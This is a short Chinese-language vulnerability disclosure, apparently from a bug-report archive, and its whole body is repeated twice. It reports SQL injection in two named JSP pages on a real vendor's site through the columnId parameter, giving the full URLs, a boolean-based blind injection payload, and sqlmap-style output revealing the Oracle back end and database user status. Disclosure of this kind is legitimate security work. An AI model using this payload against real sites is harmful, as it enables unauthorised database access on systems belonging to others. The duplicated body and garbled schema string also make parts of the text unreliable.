VULHUB ™

### 简要描述： SQL注入 ### 详细说明： 1.http://cms.kingdee.com/solutions/business/manufacture/manufactureCaseList.jsp?columnId=150201301401,150202301401,150202302401,150202303401 2.http://cms.kingdee.com/solutions/business/scm/scmCaseList.jsp?columnId=151201301,151202301 ### 漏洞证明： ``` Place: GET Parameter: columnId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: columnId=151201301,151202301%' AND 4164=4164 AND '%'=' --- web application technology: JSP back-end DBMS: Oracle ``` 不是DBA： ``` web application technology: JSP back-end DBMS: Oracle current user is DBA: False ``` 数据库： ``` back-end DBMS: Oracle current schema (equivalent to database on Oracle): '?숀`@x߂рw߱ߢߢ!' ```

### 简要描述： SQL注入 ### 详细说明： 1.http://cms.kingdee.com/solutions/business/manufacture/manufactureCaseList.jsp?columnId=150201301401,150202301401,150202302401,150202303401 2.http://cms.kingdee.com/solutions/business/scm/scmCaseList.jsp?columnId=151201301,151202301 ### 漏洞证明： ``` Place: GET Parameter: columnId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: columnId=151201301,151202301%' AND 4164=4164 AND '%'=' --- web application technology: JSP back-end DBMS: Oracle ``` 不是DBA： ``` web application technology: JSP back-end DBMS: Oracle current user is DBA: False ``` 数据库： ``` back-end DBMS: Oracle current schema (equivalent to database on Oracle): '?숀`@x߂рw߱ߢߢ!' ```